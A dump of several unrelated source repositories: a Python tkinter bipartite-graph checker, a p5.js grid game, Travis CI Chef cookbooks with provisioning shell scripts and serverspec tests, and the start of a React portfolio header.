return "day";
} else {
return "night";
}
}
|
f1de9102cacb1af80100582d1cd675f266ec3af9
|
[
"JavaScript"
] | 1
|
JavaScript
|
valinslav/minimalistweather
|
b30e717ff070d077e85081785462b2162e1e5831
|
0c6d67957aa9411ba24704c64b008cf5a97703b3
|
refs/heads/master
|
<file_sep>Program for checking a graph for bipartition by an adjacency list
example of a graph that is bipartite

example of a non-bipartite graph

<file_sep>import tkinter as tk
from tkinter import *
class List():
def __init__(self):
self.vertex = 0
self.Adj = []
self.C = [False] * self.vertex # visit
self.G = [3] * self.vertex # color
self.k = 0
# -1 - Red
# 1 - Black
def add(self, strbuf):
q = True
for i in range(0,len(strbuf)):
if strbuf[i].isdigit():
q = True
else:
q = False
break
if q:
self.k +=1
Str = "Введите вершины соединенные с вершиной " + str(self.k)
show1.set(Str)
showLabe1 = Label(root, textvariable = show1)
showLabe1.place(x=0, y=120, width=300, height=15)
buf = []
for i in range(0, len(strbuf)):
buf.append(int(strbuf[i]))
self.Adj.append(buf[:])
show4.set("Все верно")
showLabe4 = Label(root, textvariable=show4)
showLabe4.place(x=0, y=325, width=300, height=35)
else:
show4.set("Вершины заданы не корректно")
showLabe4 = Label(root, textvariable=show4)
showLabe4.place(x=0, y=325, width=300, height=35)
def addvertex(self):
buf = entry.get()
if str(buf).isdigit():
k = int(buf)
self.vertex = k
self.C = [False] * self.vertex # visit
self.G = [3] * self.vertex # color
show4.set("Все верно")
showLabe4 = Label(root, textvariable=show4)
showLabe4.place(x=0, y=325, width=300, height=35)
else:
show4.set("Кол-во вершин задано не корректно")
showLabe4 = Label(root, textvariable = show4)
showLabe4.place(x=0, y=325, width=300, height=35)
def Print(self):
show2.set(self.Adj)
showLabe2 = Label(root, textvariable=show2)
showLabe2.place(x=0, y=205, width=300, height=15)
print(self.vertex,self.Adj)
def bfs(self, graph, start):
queue = [start]
self.G[start] = 1
self.C[start] = True
while queue:
temp = queue.pop(0)
for g in graph[temp]:
if (self.C[g]):
# print("g = ", g," G[g] = ", G[g], " temp = ",temp, " G[temp] = " ,G[temp])
if (self.G[g] == self.G[temp]):
return False
continue
else:
self.C[g] = True
self.G[g] = self.G[temp] * (-1)
queue.append(g)
return True
def work(self):
if self.bfs(self.Adj,0): str = "yes, the count is dicotyledonous"
else: str = "no count dicotyledonous"
show3.set(str)
showLabe3 = Label(root, textvariable=show3)
showLabe3.place(x=0, y=290, width=300, height=35)
dll = List()
root = Tk()
root.title("Graph")
root.geometry("300x400")
show = StringVar()
show1 = StringVar()
show2 = StringVar()
show3 = StringVar()
show4 = StringVar()
entry = StringVar()
entry1 = StringVar()
def add():
dll.add(entry1.get().split())
def showS():
show.set(dll.show())
def Task():
dll.sort()
show.set(dll.show())
def Print():
dll.Print()
show.set("Введите кол-во вершин графа")
showLabe = Label(root, textvariable = show)
showLabe.place(x = 0, y = 0, width = 300, height = 35)
addEntry = Entry(root, textvariable = entry)
addEntry.place(x = 0, y = 35, width = 300, height = 35)
addButton = Button(root, text="Ввести кол-во вершин", command = dll.addvertex )
addButton.place(x=0, y= 70, width=300, height=35)
show1.set("Введите вершины соединенные с вершиной " + str(0))
showLabe1 = Label(root, textvariable = show1)
showLabe1.place(x=0, y= 120, width=300, height=15)
addEntry1 = Entry(root, textvariable = entry1)
addEntry1.place(x = 0, y = 135, width = 300, height = 35)
addButton1 = Button(root, text="Добавить элемент", command = add )
addButton1.place(x=0, y= 170, width=300, height=35)
show2.set("")
showLabe2 = Label(root, textvariable = show2)
showLabe2.place(x=0, y= 205, width=300, height=15)
addButton2 = Button(root, text="Вывести", command = Print )
addButton2.place(x=0, y= 220, width=300, height=35)
addButton3 = Button(root, text="Проверить граф на двудольность", command = dll.work )
addButton3.place(x=0, y= 255, width=300, height=35)
root.mainloop()
|
9f5f61fc0fff3b3a1a97877269d02472f7aa1882
|
[
"Markdown",
"Python"
] | 2
|
Markdown
|
l0ki69/bipartite_count_.py
|
2c746becab2b530e0751d5a6cf2885c4a68e9680
|
d75752dbe46a7e57d714122caa11a670db101c4d
|
refs/heads/master
|
<file_sep>function keyReleased() {
if (keyCode === 101) guy.inv = false;
}
function keyPressed() {
//WASD
/*
if(key === "W") guy.move(-scl, 1);
if(key === "A") guy.move(-scl, 0);
if(key === "S") guy.move(scl, 1);
if(key === "D") guy.move(scl, 0);
*/
//Arrows
/*
if(keyCode === UP_ARROW) guy.move(-scl, 1);
if(keyCode === LEFT_ARROW) guy.move(-scl, 0);
if(keyCode === DOWN_ARROW) guy.move(scl, 1);
if(keyCode === RIGHT_ARROW) guy.move(scl, 0);
*/
//Numpad
///*
if (keyCode === 97) guy.move(-scl, 3); //1
if (keyCode === 98) guy.move(scl, 1); //2
if (keyCode === 99) guy.move(scl, 2); //3
if (keyCode === 100) guy.move(-scl, 0); //4
if (keyCode === 102) guy.move(scl, 0); //6
if (keyCode === 103) guy.move(-scl, 2); //7
if (keyCode === 104) guy.move(-scl, 1); //8
if (keyCode === 105) guy.move(scl, 3); //9
//*/
//test
///*
if (keyCode === 101) guy.inv = true; //Numpad5
if (key === " ") secretRoom = ~secretRoom; //spacebar
}
<file_sep>function Guy(xg, yg, ig) {
this.HPm = 20;
this.HP = this.HPm;
this.x = xg;
this.y = yg;
this.inv = false;
this.lvl = ig;
this.e = true;
//var hp0 = e.allys;
//this.hp = hp0[0].health;
/*punti*/ //vedi Grafici\RectReference.PNG (Windows)
this.A = createVector(xg, yg);
this.B = createVector(xg + scl, yg);
this.C = createVector(xg, yg + scl);
this.D = createVector(xg + scl, yg + scl);
/*punti*/
this.move = function(dir, axis) {
//axis = 0 --> x / axis = 1 --> y
var c = axis;
switch (c) {
case 0:
this.x += dir;
break;
case 1:
this.y += dir;
break;
case 2:
this.x += dir;
this.y += dir;
break;
case 3:
this.x += dir;
this.y -= dir;
break;
}
}
this.spawn = function() {
this.A = createVector(this.x, this.y);
this.B = createVector(this.x + scl, this.y);
this.C = createVector(this.x, this.y);
this.D = createVector(this.x + scl, this.y + scl);
if (this.e) {
if (this.inv) {
if (secretRoom) fill(255, 10, 100);
else fill(60);
} else fill(255);
rect(this.x, this.y, scl, scl);
this.x = constrain(this.x, 0, roomW - scl);
this.y = constrain(this.y, 0, roomH - scl);
}
}
this.death = function() {
score = 0;
secretRoom = false;
alert("Sei morto! :(");
this.x = xg;
this.y = yg;
}
this.lvlup = function() {
if (this.lvl >= 0 && this.lvl <= 4) this.lvl++;
}
this.shoot = function(dir) {
this.shots = [];
}
}
<file_sep>function fantoccioEnemy(xfe, yfe, ife) {
this.x = xfe;
this.y = yfe;
this.inv = ife;
this.spawn = function() {
if (this.inv) fill(60);
else fill(255, 0, 0);
rect(this.x, this.y, scl, scl);
}
}
function fantoccioGuy(xfg, yfg, ifg) {
this.x = xfg;
this.y = yfg;
this.inv = ifg;
this.spawn = function() {
if (this.inv) fill(60);
else fill(255);
rect(this.x, this.y, scl, scl);
}
}
<file_sep>function Enemy(ie) {
this.shoot = function() {
var c = this.scan();
var xs = this.x;
var ys = this.y;
var xsSpd = 0;
var ysSpd = 0;
if (c !== 0) {
fill(0, 255, 0);
ellipse(xs, ys, 13, 13)
if (c === 1) xs += scl;
if (c === 2) xs -= scl;
if (c === 3) ys += scl;
if (c === 4) xs -= scl;
}
}
this.scan = function() {
if (this.x === guy.x) {
if (this.y < guy.y) return 1; //RIGHT
else if (this.y > guy.y) return 2; //LEFT
} else if (this.y === guy.y) {
if (this.x < guy.x) return 3; //DOWN
else if (this.x > guy.x) return 4; //UP
} else return 0;
}
this.spawn = function() {
this.x = Math.floor(random(cols)) * scl;
this.y = Math.floor(random(rows)) * scl;
this.e = true;
this.inv = ie;
}
this.death = function() {
this.e = false;
score++;
}
this.view = function() {
if (this.e) {
if (this.inv) fill(60);
else fill(255, 0, 0);
rect(this.x, this.y, scl, scl);
}
if (this.x === guy.x && this.y === guy.y) guy.death();
this.x = constrain(this.x, 0, roomW - scl);
this.y = constrain(this.y, 0, roomH - scl);
}
}
<file_sep>//canvas infos
var scl = 20;
var roomH = 600;
var roomW = 600;
var barH = 2 * scl;
var canvasH = roomH + barH;
var canvasW = 600;
var score = 0;
var secretRoom = false;
var cols = Math.floor(roomW / scl);
var rows = Math.floor(roomH / scl);
//JSON files
var EntityTypes;
var Enchantments;
var Items;
//objects
var guy;
var e1;
var lbguy;
//objects arrays
var lifebar = [];
function preLoad() {
EntityTypes = loadJSON('EntityTypes.json');
Items = loadJSON('Items.json');
Enchantments = loadJSON('Enchantments.json');
}
function setup() {
createCanvas(canvasW, canvasH);
guy = new Guy(1 * scl, roomH / 2, false);
e1 = new Enemy(false);
do {
e1.spawn();
} while (guy.y == e1.y && guy.x == e1.x);
}
function draw() {
for (var i = 0; i < guy.HPm; i++) {
var lifecolor;
var j = i + 1;
var roba = new lifecontainer();
if (j <= guy.HP) {
var R = 255;
var G = 180;
var B = 0;
} else {
var R = 255;
var G = 255;
var B = 255;
}
var X = scl / 2 + i * scl;
var Y = roomH + scl / 2;
roba.show(X, Y, R, G, B);
lifebar[i] = roba;
}
if (secretRoom) background(255, 0, 100);
else background(51);
fill(25);
rect(0, roomH, canvasW, barH);
guy.spawn();
e1.view();
var fscan = e1.scan();
e1.shoot(fscan);
}
<file_sep>function lifecontainer() {
this.show = function(XHP, YHP, RHP, GHP, BHP) {
this.x = XHP;
this.y = YHP;
fill(RHP, GHP, BHP);
rect(XHP, YHP, scl, scl);
}
}
|
eaa2ff7655165f35c13ee2870d91270b773c3eef
|
[
"JavaScript"
] | 6
|
JavaScript
|
emanuele6/TestGame
|
2d37db29bb1c2487e8b48130f3064a9c75174f14
|
ed99e23dfca925d7bc94ec8be4d1c578ef6cecc4
|
refs/heads/master
|
<file_sep># frozen_string_literal: true
if os[:arch] !~ /ppc64/
describe 'riak installation', sudo: true do
before :all do
sh('sudo riak start')
end
describe package('riak') do
it { should be_installed }
end
describe command('riak version') do
its(:stdout) { should match(/^\d/) }
its(:exit_status) { should eq 0 }
end
describe command('sudo riak ping') do
its(:stdout) { should match(/^pong$/) }
end
describe command(
'for n in 0 1 2 3 4 ; do ' \
'sudo riak-admin test || true ; ' \
'echo ; ' \
'sleep 1 ; ' \
'done'
) do
its(:stdout) { should match(%r{^Successfully completed 1 read/write cycle}) }
end
end
end
<file_sep>#!/usr/bin/env bash
set -o errexit
# http://anonscm.debian.org/cgit/pkg-ssh/openssh.git/tree/debian/openssh-server.postinst?id=c77724ca2355dec905cfa1e18930c79e32db2d4e
main() {
: "${ETC_SSH:=/etc/ssh}"
for key in rsa:4096 ecdsa:521 ed25519:256; do
local keytype="${key%%:*}"
local keybits="${key##*:}"
local keyfile="${ETC_SSH}/ssh_host_${keytype}_key"
if [ -f "${keyfile}" ]; then
echo "INFO: '${keytype}' key (${keyfile}) already exists; not regenerating."
continue
fi
echo "INFO: generating '${keytype}' key (${keyfile}); this may take some time..."
ssh-keygen -q -f "${keyfile}" -N '' -t "${keytype}" -b "${keybits}"
ssh-keygen -l -f "${keyfile}.pub"
done
}
main "$@"
<file_sep># frozen_string_literal: true
include_attribute 'travis_internal_base'
override['openssh']['server']['force_command'] = '/usr/sbin/login_duo'
override['openssh']['server']['log_level'] = 'VERBOSE'
override['openssh']['server']['permit_tunnel'] = 'no'
<file_sep>travis_tfw Cookbook
===================
A cookbook for a [tiny floating whale](http://steven-universe.wikia.com/wiki/Tiny_Floating_Whale)!
<file_sep>travis_ci_cookiecat Cookbook
============================
A wrapper cookbook for the "cookiecat" CI image.
<file_sep>#!/usr/bin/env bash
# Chef manages this file on <%= node.name %> <3 <3 <3
set -o errexit
set -o xtrace
main() {
: "${DEVICE:=<%= @device %>}"
: "${METADATA_SIZE:=<%= @metadata_size %>}"
if [[ -e /dev/direct-lvm/metadata ]]; then
echo "$(basename "${0}"): Metadata volume already exists. Assuming set up"
exit 0
fi
pvcreate -y "${DEVICE}"
vgcreate direct-lvm "${DEVICE}"
lvcreate -n metadata direct-lvm --size "${METADATA_SIZE}"
dd if=/dev/zero of=/dev/direct-lvm/metadata bs=1M count=10
lvcreate -n data direct-lvm -l '100%FREE'
dd if=/dev/zero of=/dev/direct-lvm/data bs=1M count=10
}
main "$@"
<file_sep>#!/usr/bin/env bash
set -o errexit
set -o xtrace
export DEBIAN_FRONTEND='noninteractive'
if [[ ${PACKER_BUILDER_TYPE} =~ vmware ]]; then
APT_GET_INSTALL_PRE_CHEF='open-vm-tools'
fi
rm -vf /etc/apt/sources.list.d/partner.list
apt-get update -yqq
apt-get install -yqq \
--no-install-suggests \
--no-install-recommends \
at \
cron \
curl \
git \
sudo \
wget \
${APT_GET_INSTALL_PRE_CHEF}
mkdir -p /tmp/chef-stuff/cookbooks
git clone --branch=v1.3.4 git://github.com/opscode-cookbooks/openssh.git /tmp/chef-stuff/cookbooks/openssh
git clone --branch=v2.7.0 git://github.com/opscode-cookbooks/apt.git /tmp/chef-stuff/cookbooks/apt
git clone --branch=v1.1.6 git://github.com/opscode-cookbooks/chef_handler.git /tmp/chef-stuff/cookbooks/chef_handler
git clone --branch=v2.7.1 git://github.com/opscode-cookbooks/sudo.git /tmp/chef-stuff/cookbooks/sudo
git clone git://github.com/travis-infrastructure/users-cookbook.git /tmp/chef-stuff/cookbooks/users
git clone git://github.com/travis-ci/travis-cookbooks.git /tmp/chef-stuff/travis-cookbooks
git --git-dir=/tmp/chef-stuff/cookbooks/users/.git --work-tree=/tmp/chef-stuff/cookbooks/users checkout 9b807fc8a131383d3b43b9a92a17be7f35520d52
git --git-dir=/tmp/chef-stuff/travis-cookbooks/.git --work-tree=/tmp/chef-stuff/travis-cookbooks checkout 5d4d4dea02071<KEY>
<file_sep># frozen_string_literal: true
override['openssh']['client']['10.*']['strict_host_key_checking'] = 'no'
override['openssh']['client']['10.*']['user_known_hosts_file'] = '/dev/null'
override['openssh']['server']['allow_tcp_forwarding'] = 'no'
override['openssh']['server']['challenge_response_authentication'] = 'no'
override['openssh']['server']['listen_address'] = %w(0.0.0.0:22 [::]:22)
override['openssh']['server']['match']['Host *']['password_authentication'] = 'no'
override['openssh']['server']['match']['Host *']['pubkey_authentication'] = 'yes'
override['openssh']['server']['password_authentication'] = 'no'
override['openssh']['server']['permit_root_login'] = 'no'
override['openssh']['server']['protocol'] = '2'
override['openssh']['server']['pubkey_authentication'] = 'yes'
override['openssh']['server']['kex_algorithms'] = %w[
curve25519-sha256<EMAIL>
diffie-hellman-group-exchange-sha256
].join(',')
override['openssh']['server']['host_key'] = %w[
/etc/ssh/ssh_host_ed25519_key
/etc/ssh/ssh_host_rsa_key
]
override['openssh']['server']['ciphers'] = %w[
chacha20-poly1305@<EMAIL>
<EMAIL>
<EMAIL>
aes256-ctr
aes192-ctr
aes128-ctr
].join(',')
override['openssh']['server']['m_a_cs'] = %w[
hmac-sha2-512-etm<EMAIL>
hmac-sha2-256-etm<EMAIL>
<EMAIL>-ripemd160-et<EMAIL>
<EMAIL>
hmac-sha2-512
hmac-sha2-256
hmac-ripemd160
<EMAIL>
].join(',')
override['travis_sudo']['groups'] = %w[sudo]
<file_sep>travis_ci_connie Cookbook
==========================
A wrapper cookbook for the connie CI image.
<file_sep># frozen_string_literal: true
describe 'sshd configuration' do
describe command('sudo sshd -T') do
its(:stdout) { should include(*EXPECTED_SSHD_CONFIG) }
end
end
EXPECTED_SSHD_CONFIG = <<~EOF.split("\n")
addressfamily any
clientaliveinterval 0
ignorerhosts yes
ignoreuserknownhosts no
kerberosauthentication no
kerberosorlocalpasswd yes
kerberosticketcleanup yes
passwordauthentication no
printmotd yes
strictmodes yes
tcpkeepalive yes
uselogin no
xauthlocation /usr/bin/xauth
EOF
<file_sep># frozen_string_literal: true
override['maven']['install_java'] = false
default['travis_ci_cookiecat']['prerequisite_packages'] = %w[
cron
curl
git
sudo
wget
]
override['travis_phpenv']['prerequisite_recipes'] = []
override['travis_phpbuild']['prerequisite_recipes'] = []
override['travis_perlbrew']['perls'] = []
override['travis_perlbrew']['modules'] = []
override['travis_perlbrew']['prerequisite_packages'] = []
gimme_versions = %w[
1.7.4
]
override['travis_build_environment']['gimme']['versions'] = gimme_versions
override['travis_build_environment']['gimme']['default_version'] = gimme_versions.max
override['travis_build_environment']['pythons'] = []
override['travis_build_environment']['python_aliases'] = {}
override['travis_build_environment']['pip']['packages'] = {}
override['travis_build_environment']['system_python']['pythons'] = []
override['travis_build_environment']['nodejs_default'] = ''
override['travis_build_environment']['nodejs_versions'] = []
override['travis_build_environment']['nodejs_aliases'] = {}
override['travis_build_environment']['nodejs_default_modules'] = []
rubies = %w[
2.2.7
2.4.1
]
override['travis_build_environment']['default_ruby'] = rubies.max
override['travis_build_environment']['rubies'] = rubies
override['travis_build_environment']['php_versions'] = []
override['travis_build_environment']['php_aliases'] = {}
override['travis_build_environment']['otp_releases'] = []
override['travis_build_environment']['elixir_versions'] = []
override['travis_build_environment']['default_elixir_version'] = ''
override['travis_build_environment']['hhvm_enabled'] = false
override['travis_build_environment']['update_hostname'] = false
override['travis_build_environment']['use_tmpfs_for_builds'] = false
override['travis_build_environment']['install_gometalinter_tools'] = false
override['travis_build_environment']['mercurial_install_type'] = 'pip'
override['travis_build_environment']['mercurial_version'] = '4.2.2~trusty1'
override['travis_system_info']['commands_file'] = \
'/var/tmp/cookiecat-system-info-commands.yml'
override['android-sdk']['java_from_system'] = true
override['android-sdk']['owner'] = 'travis'
override['android-sdk']['group'] = 'travis'
override['android-sdk']['license']['default_answer'] = 'y'
override['android-sdk']['scripts']['owner'] = 'travis'
override['android-sdk']['scripts']['group'] = 'travis'
override['travis_java']['default_version'] = 'oraclejdk8'
override['travis_java']['alternate_versions'] = %w[
openjdk7
openjdk8
]
override['leiningen']['home'] = '/home/travis'
override['leiningen']['user'] = 'travis'
override['travis_build_environment']['update_hostname'] = false
override['travis_build_environment']['use_tmpfs_for_builds'] = false
override['travis_packer_templates']['job_board']['stack'] = 'cookiecat'
override['travis_packer_templates']['job_board']['features'] = %w[
basic
disabled-ipv6
docker
docker-compose
jdk
]
override['travis_packer_templates']['job_board']['languages'] = %w[
__cookiecat__
android
]
<file_sep>#!/usr/bin/env bash
set -o errexit
main() {
set -o xtrace
export DEBIAN_FRONTEND=noninteractive
echo 1 >/proc/sys/net/ipv4/ip_forward
echo net.ipv4.ip_forward=1 >>/etc/sysctl.conf
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
iptables -A FORWARD -i eth0 -o eth1 -m state --state RELATED,ESTABLISHED -j ACCEPT
iptables -A FORWARD -i eth1 -o eth0 -j ACCEPT
apt-get update -yqq
apt-get install -yqq iptables-persistent
}
main "${@}"
<file_sep>travis_ci_garnet Cookbook
=========================
A wrapper cookbook for the "garnet" CI image.
<file_sep># frozen_string_literal: true
require 'support'
def rmq
@rmq ||= Support::RabbitMQAdmin.new
end
describe 'rabbitmq installation' do
before :all do
sh('sudo service rabbitmq-server start')
tcpwait('127.0.0.1', 5672)
sh("#{rmq.exe} declare queue " \
'name=my-test-queue durable=false')
sh("#{rmq.exe} publish exchange=amq.default " \
'routing_key=my-test-queue payload="hello, world"')
sleep 2
end
describe package('rabbitmq-server') do
it { should be_installed }
end
describe 'rabbitmq commands', sudo: true do
if os[:release] !~ /16/
describe command('sudo service rabbitmq-server status') do
its(:stdout) { should match 'running_applications' }
end
else
describe command('sudo service rabbitmq-server status') do
its(:stdout) { should include('active (running)') }
end
end
describe command('sudo rabbitmqctl status') do
its :stdout do
should match(/Status of node '?rabbit@/)
should include('running_applications')
end
end
end
describe 'rabbitmqadmin commands', sudo: true do
describe command("#{rmq.exe} list queues") do
its(:stdout) { should include('my-test-queue') }
end
end
end
<file_sep>#!/usr/bin/env bash
# vim:filetype=sh
set -o errexit
main() {
: "${ETCDIR:=/etc}"
: "${RUNDIR:=/var/tmp/travis-run.d}"
if [ ! -f "${RUNDIR}/instance-hostname.tmpl" ]; then
echo "Missing ${RUNDIR}/instance-hostname.tmpl"
exit 0
fi
local hosts_line
local instance_hostname
local instance_id
local instance_ipv4
curl -sSL 'http://169.254.169.254/latest/meta-data/instance-id' \
>"${RUNDIR}/instance-id"
instance_id="$(cat "${RUNDIR}/instance-id")"
instance_id="${instance_id:0:9}"
curl -sSL 'http://169.254.169.254/latest/meta-data/local-ipv4' \
>"${RUNDIR}/instance-ipv4"
instance_ipv4="$(cat "${RUNDIR}/instance-ipv4")"
instance_hostname="$(
sed "s/___INSTANCE_ID___/${instance_id}/g" \
"${RUNDIR}/instance-hostname.tmpl"
)"
hosts_line="${instance_ipv4} ${instance_hostname} ${instance_hostname%%.*}"
echo "${instance_hostname}" |
tee "${ETCDIR}/hostname" >"${RUNDIR}/instance-hostname"
hostname -F "${ETCDIR}/hostname"
if ! grep -q "^${hosts_line}" "${ETCDIR}/hosts"; then
echo "${hosts_line}" | tee -a "${ETCDIR}/hosts"
fi
}
main "$@"
<file_sep>travis_ci_amethyst Cookbook
===========================
A wrapper cookbook for the "amethyst" CI image.
<file_sep># frozen_string_literal: true
name 'travis_ci_cookiecat'
maintainer 'Travis CI GmbH'
maintainer_email '<EMAIL>'
license 'MIT'
description 'Installs/Configures travis_ci_cookiecat'
long_description IO.read(File.join(File.dirname(__FILE__), 'README.md'))
version '0.1.0'
source_url 'https://github.com/travis-ci/packer-templates'
issues_url 'https://github.com/travis-ci/packer-templates/issues'
depends 'android-sdk'
depends 'openssl'
depends 'travis_build_environment'
depends 'travis_docker'
depends 'travis_java'
depends 'travis_packer_templates'
depends 'travis_sbt_extras'
depends 'travis_system_info'
<file_sep># `travis_internal_bastion` Cookbook
<file_sep>#!/usr/bin/env bash
# vim:filetype=sh
set -o errexit
main() {
rm -vf "${SUDOERS_D:-/etc/sudoers.d}/travis"
}
main "$@"
<file_sep>#!/usr/bin/env bash
set -o errexit
main() {
DOCKERD=/usr/bin/dockerd
DOCKER_OPTS=
for filename in docker-chef docker-cloud-init docker docker-local; do
if [[ -f "/etc/default/${filename}" ]]; then
# shellcheck source=/dev/null
source "/etc/default/${filename}"
fi
done
if [[ -z "${TRAVIS_DOCKER_DISABLE_DIRECT_LVM}" ]]; then
travis-docker-volume-setup
DOCKER_OPTS="$DOCKER_OPTS --config-file=/etc/docker/daemon-direct-lvm.json"
fi
# shellcheck disable=SC2086
exec "${DOCKERD}" $DOCKER_OPTS --raw-logs
}
main "$@"
<file_sep># frozen_string_literal: true
# Cookbook Name:: travis_tfw
# Recipe:: default
#
# Copyright 2017, Travis CI GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
require 'json'
include_recipe 'travis_internal_base'
include_recipe 'travis_docker'
package %w[
lvm2
xfsprogs
]
template '/usr/local/bin/travis-docker-volume-setup' do
source 'travis-docker-volume-setup.sh.erb'
owner 'root'
group 'root'
mode 0o755
variables(
device: node['travis_tfw']['docker_volume_device'],
metadata_size: node['travis_tfw']['docker_volume_metadata_size']
)
end
cookbook_file '/usr/local/bin/travis-tfw-combined-env' do
owner 'root'
group 'root'
mode 0o755
end
cookbook_file '/usr/local/bin/travis-docker-wrapper' do
owner 'root'
group 'root'
mode 0o755
end
template '/etc/default/docker-chef' do
source 'etc-default-docker-chef.sh.erb'
owner 'root'
group 'root'
mode 0o644
end
file '/etc/default/docker' do
content "# this space intentionally left blank\n"
owner 'root'
group 'root'
mode 0o644
end
daemon_json = {
'graph' => node['travis_tfw']['docker_dir'],
'hosts' => %w[
tcp://127.0.0.1:4243
unix:///var/run/docker.sock
],
'icc' => false,
'userns-remap' => 'default'
}
file '/etc/docker/daemon.json' do
content JSON.pretty_generate(daemon_json) + "\n"
owner 'root'
group 'root'
mode 0o644
end
file '/etc/docker/daemon-direct-lvm.json' do
content JSON.pretty_generate(
daemon_json.merge(
'storage-driver' => 'devicemapper',
'storage-opts' => {
'dm.basesize' => node['travis_tfw']['docker_dm_basesize'],
'dm.datadev' => '/dev/direct-lvm/data',
'dm.metadatadev' => '/dev/direct-lvm/metadata',
'dm.fs' => node['travis_tfw']['docker_dm_fs']
}.to_a.map { |pair| pair.join('=') }
)
) + "\n"
owner 'root'
group 'root'
mode 0o644
end
template '/etc/init/docker.conf' do
source 'etc-init-docker.conf.erb'
owner 'root'
group 'root'
mode 0o644
end
directory '/etc/systemd/system/docker.service.d' do
owner 'root'
group 'root'
mode 0o755
only_if { ::File.directory?('/etc/systemd/system') }
end
template '/etc/systemd/system/docker.service.d/travis.conf' do
source 'etc-systemd-system-docker.service.d-travis.conf.erb'
owner 'root'
group 'root'
mode 0o644
only_if { ::File.directory?('/etc/systemd/system') }
end
service 'docker' do
action %i[enable start]
end
<file_sep># frozen_string_literal: true
name 'travis_internal_base'
maintainer 'Travis CI GmbH'
maintainer_email '<EMAIL>'
license 'MIT'
description 'Installs/Configures travis_internal_base'
long_description IO.read(File.join(File.dirname(__FILE__), 'README.md'))
version '0.1.0'
source_url 'https://github.com/travis-ci/packer-templates'
issues_url 'https://github.com/travis-ci/packer-templates/issues'
depends 'apt'
depends 'openssh'
depends 'papertrail'
depends 'travis_sudo'
<file_sep># frozen_string_literal: true
describe user('travis') do
it { should exist }
it { should have_home_directory('/home/travis') }
it 'has an unexpected password' do
# get the encrypted password directly, since serverspec doesn't appear to
# take current uid into account, meaning it doesn't use sudo when it should
encrypted_password = `sudo getent shadow travis | cut -f 2 -d ':'`.strip
salt = encrypted_password.split('$').fetch(2)
re_encrypted = `mkpasswd -m sha-512 travis #{salt}`.strip
expect(encrypted_password).to_not eq(re_encrypted)
end
end
<file_sep># frozen_string_literal: true
module Support
class RabbitMQAdmin
def exe
ensure_available!
dest
end
def ensure_available!
return if dest.exist? && dest.executable?
download_rabbitmqadmin
end
private
def download_rabbitmqadmin
system "curl -sSL -o #{dest} #{url}"
dest.chmod(0o0755)
end
def dest
Pathname.new(
ENV['RABBITMQADMIN_DEST'] || Support.tmpdir.join('rabbitmqadmin')
)
end
def url
ENV['RABBITMQADMIN_URL'] ||
'https://raw.githubusercontent.com/rabbitmq/rabbitmq-management/master/bin/rabbitmqadmin'
end
end
end
<file_sep>#!/usr/bin/env bash
# vim:filetype=sh
set -o errexit
set -o pipefail
main() {
: "${RSYSLOG_PAPERTRAIL_CONF:=/etc/rsyslog.d/65-papertrail.conf}"
: "${SYSLOG_ADDRESS_FILE:=/var/tmp/travis-run.d/syslog-address}"
if [[ ! -f "${SYSLOG_ADDRESS_FILE}" ]]; then
echo "Missing ${SYSLOG_ADDRESS_FILE}"
exit 0
fi
local syslog_address
syslog_address="$(cat "${SYSLOG_ADDRESS_FILE}")"
touch "${RSYSLOG_PAPERTRAIL_CONF}"
sed -i '/^\*\.\*.*@/d' "${RSYSLOG_PAPERTRAIL_CONF}"
echo "*.* @${syslog_address}" >>"${RSYSLOG_PAPERTRAIL_CONF}"
service rsyslog stop || true
service rsyslog start || true
}
main "$@"
<file_sep># `travis_internal_base` Cookbook
<file_sep># frozen_string_literal: true
default['travis_tfw']['docker_environment']['TRAVIS_DOCKER_TFW'] = 'oooOOOoooo'
default['travis_tfw']['docker_volume_device'] = '/dev/xvdc'
default['travis_tfw']['docker_volume_metadata_size'] = '2G'
default['travis_tfw']['docker_dm_basesize'] = '12G'
default['travis_tfw']['docker_dm_fs'] = 'xfs'
default['travis_tfw']['docker_dir'] = '/mnt/docker'
<file_sep># frozen_string_literal: true
require 'support'
include Support::Helpers
describe 'tiny floating whale docker setup', docker: false do
before :all do
sh('sudo service docker start')
end
describe service('docker') do
it { should be_enabled }
it { should be_running }
end
describe package('lvm2') do
it { should be_installed }
end
describe package('xfsprogs') do
it { should be_installed }
end
describe file('/etc/default/docker-chef') do
it { should exist }
its(:content) { should include('Chef manages') }
end
describe file('/etc/default/docker') do
it { should exist }
its(:content) { should include('left blank') }
end
describe file('/etc/init/docker.conf') do
it { should exist }
its(:content) { should include('$TRAVIS_DOCKER_DISABLE_DIRECT_LVM') }
end
end
|
01199a10cc094ac5e5b06e9b584e08dbe05d7e34
|
[
"Markdown",
"Ruby",
"Shell"
] | 28
|
Ruby
|
edmorley/packer-templates
|
9d757c9d9e5f9287ddf86f5234489b5905ab26cb
|
091af8ba15d5e06be21c8a5debe5fc91a0896f0b
|
refs/heads/master
|
<repo_name>fnaquira/portfolio<file_sep>/src/components/Layout.js
import React, { Fragment } from 'react';
import Header from './Header';
import About from './About';
const Layout = props => {
return (
<Fragment>
<Header />
<About />
</Fragment>
);
};
export default Layout;
<file_sep>/src/components/Header.js
import React from 'react';
import Scrollchor from 'react-scrollchor';
import { FaGithub, FaLinkedin, FaDownload } from 'react-icons/fa';
const Header = props => {
return (
<div className="main-menu" id="menu">
<div className="main-img">
<div className="main-content">
<div className="title">
<img
className="name-logo"
src="../../public/name_logo.png"
alt="<NAME>"
/>
<div className="button-bar">
<button className="nav-button">
{' '}
<Scrollchor to="#skills-section" className="nav-link">
Skills
